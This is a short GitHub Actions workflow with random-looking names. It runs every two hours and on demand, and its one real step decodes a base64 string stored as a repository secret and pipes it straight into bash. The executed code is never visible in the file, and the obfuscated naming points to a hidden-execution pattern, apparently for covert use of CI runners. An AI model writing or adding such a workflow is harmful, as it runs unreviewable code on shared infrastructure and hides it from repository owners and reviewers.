name: FDiCXGUJi
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  ttlMjURcnLSO:
    runs-on: ubuntu-latest
    env:
      JsFYaW: ${{ secrets.pRUhtDn }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.GXmgDZUbtf }}" | base64 -d | bash